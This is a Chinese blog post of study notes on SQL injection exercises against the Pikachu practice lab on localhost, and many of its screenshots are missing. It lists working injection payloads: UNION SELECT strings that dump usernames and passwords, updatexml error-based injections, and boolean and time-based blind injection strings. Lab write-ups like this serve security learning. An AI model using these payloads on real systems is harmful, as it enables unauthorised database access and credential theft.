Pikachu sql 注入实战

学习笔记—Pikachu sql 注入实战

一、安装Pikachu
在这里插入图片描述
在这里插入图片描述
二、数字型注入:
在这里插入图片描述
在这里插入图片描述
三、字符型注入:
http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php
?name=vince%27+union+select+username%2Cpassword+from+users+%23
&submit=&Submit
在这里插入图片描述
四、搜索型注入:
http://127.0.0.1/pikachu-master/vul/sqli/sqli_search.php?name=a%27+union+select+username,password,3%20from+users+%23&submit=%E6%90%9C%E7%B4%A2
在这里插入图片描述
五、xx型注入:
http://127.0.0.1/pikachu-master/vul/sqli/sqli_x.php?kobe%27)%20union%20select%20username,password%20from%20users%20&submit=&Submit
在这里插入图片描述
六、“insert/update”注入:
在这里插入图片描述
在这里插入图片描述
七、“delete”注入
pikachu-master/vul/sqli/sqli_del.php?id=58+or+updatexml(1,concat(0x7e,database()),0) HTTP/1.1
Host: 127.0.0.1
在这里插入图片描述
八、“http header”注入
在这里插入图片描述
Firefox/56.0’,1,updatexml(1,concat(0x7e,(select database()),0x7e),1)) #
在这里插入图片描述
九、盲注(base on boolian)
kobe’ and ascii(substr(database(),1,1))=112#
在这里插入图片描述
十、盲注(base on time)
在这里插入图片描述
在这里插入图片描述
kobe’ and if((substr(database(),1,1))=‘a’,sleep(5),null)#
在这里插入图片描述
宽字节注入(见后续)
了解更多请关注下列公众号:
在这里插入图片描述

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值